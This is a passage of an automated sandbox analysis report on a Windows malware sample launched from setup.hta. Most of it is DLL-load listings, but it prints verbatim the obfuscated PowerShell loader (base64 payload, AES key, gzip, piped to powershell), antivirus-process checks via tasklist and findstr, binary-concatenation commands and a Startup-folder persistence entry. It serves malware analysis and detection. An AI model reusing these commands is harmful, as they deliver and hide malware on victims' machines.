              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wininet.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: napinsp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: pnrpnsp.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: wshbth.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: nlaapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: winrnr.dll
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifSection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dll
              Source: amsi32_4408.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4820, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 4408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engineClassification label: mal100.troj.spyw.evad.winHTA@49/50@11/10
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A7B300 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,8_2_00A7B300
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A75200 _wtol,SHGetSpecialFolderPathW,_DebugHeapAllocator,_wtol,_DebugHeapAllocator,CoCreateInstance,8_2_00A75200
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeCode function: 8_2_00A79FC0 memcpy,SystemParametersInfoW,GetDC,GetDeviceCaps,MulDiv,ReleaseDC,GetModuleHandleW,FindResourceA,LoadResource,LockResource,DialogBoxIndirectParamW,8_2_00A79FC0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\ClassroomEc.exeJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8164:120:WilError_03
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ypevna2a.nq5.ps1Jump to behavior
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
              Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
              Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\setup.hta"
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1952,i,13972747378656180607,2639153371829192782,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe"
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\ClassroomEc.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Avoid Avoid.bat & Avoid.bat & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 30253
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Producing + Imaging + Phd + Ada + Organ 30253\Identification.pif
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Conf 30253\m
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pif 30253\Identification.pif 30253\m
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
              Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\30253\Identification.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & echo URL="C:\Users\user\AppData\Local\NeuraConnect Technologies\NeuraLink.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NeuraLink.url" & exit
              Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $gIWXcqO = 'AAAAAAAAAAAAAAAAAAAAAH+Ni+e0B2ks3MmnD0sjpK+fk7MupFILZ9VVeKtme+yyv7VBgriarnlhwOcDd3XnPYAZs1Tppp56hNLmknzg3RqlLZoWww3pr9GTVi4PQRFZ4Ymgg1kiMEK8k6tSH0FMP/6pzSLCCm7m343xSrtqho71KivioXDdV9RXUEizSVv/r8WV5Pa7k2Heaf/g1dNAET06jn6Lwy+3XxYBIZ8Z2SgFrwiakMLK9DaB/lEruY0OeDX+Hdr0opeUvoDL8s3TYxPu555rLX05cTD0ToGQ2y+lNPX6Fd4Bm0mfpAp0pqtz0Trl0pba/499qW6oyZTYgixjQ47fiytqQcaIZP9WkwPlfVpxMSua7NOylmdcJhQWUYN6kEASQ952Ex0UEpaIptSXAQOA6loYOMEfPb1EVPJ3uzMpl9BHjDqJhN1/oLox0/aPLc7VbmQV7FidtYCO5ezZrtDcgspB4G8S6VZ9Sjg0QNg+jHmUfYdvDUMhXrj23a1QyqUbSLMhJDW4sNDUud7HtFVqeAGS/Sl3nluTQKPifMztty2aLUs2SdQ4ofB+z/wvUPl80+6+LH5XqNj8M1Zd2OZ2juaG9QCdS6eD1lwBdfwkGK1Cexwfukroqw+5t52gJ98O+jLN7pAgKZCbb87QC9doFNVZ0xR6NVkJ3ydwbpVe9gy2uRSQ2Smekc28xEG/oGbv4H/40VYmmQ48SZmio+DL98HetDuYJDA10+uKtzg0ZRZ9tre7n2DUAlC7aKHFKe8XXTlSjeBJaB+74TbyhG6tbN3q8JEsTWFHavCG/74qYRYHv51RGapuS4YimLfGDcI+kN5tHO8qHFY2APvSJgWWvc4NaNwYwKEOdGVs3cuD2h7Z0Etr930+QCfF';$PAvNVyn = 'eW1FbE1LT2RGdGV3TXdRUlpyWFFRbnZGeFdtd1R3Z2w=';$Hgjhdnd = New-Object 'System.Security.Cryptography.AesManaged';$Hgjhdnd.Mode = [System.Security.Cryptography.CipherMode]::ECB;$Hgjhdnd.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$Hgjhdnd.BlockSize = 128;$Hgjhdnd.KeySize = 256;$Hgjhdnd.Key = [System.Convert]::FromBase64String($PAvNVyn);$fmSHI = [System.Convert]::FromBase64String($gIWXcqO);$HwKLSIPl = $fmSHI[0..15];$Hgjhdnd.IV = $HwKLSIPl;$bKVkoZaIu = $Hgjhdnd.CreateDecryptor();$woNqXSfkI = $bKVkoZaIu.TransformFinalBlock($fmSHI, 16, $fmSHI.Length - 16);$Hgjhdnd.Dispose();$LMMKhz = New-Object System.IO.MemoryStream( , $woNqXSfkI );$dYlrlK = New-Object System.IO.MemoryStream;$cYowFoTfZ = New-Object System.IO.Compression.GzipStream $LMMKhz, ([IO.Compression.CompressionMode]::Decompress);$cYowFoTfZ.CopyTo( $dYlrlK );$cYowFoTfZ.Close();$LMMKhz.Close();[byte[]] $OhXploZ = $dYlrlK.ToArray();$mkeeaJ = [System.Text.Encoding]::UTF8.GetString($OhXploZ);$mkeeaJ | powershell -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://2no.co/2ZrVm4Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\ClassroomEc.exe "C:\Users\user\AppData\Roaming\ClassroomEc.exe" Jump to behavior
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
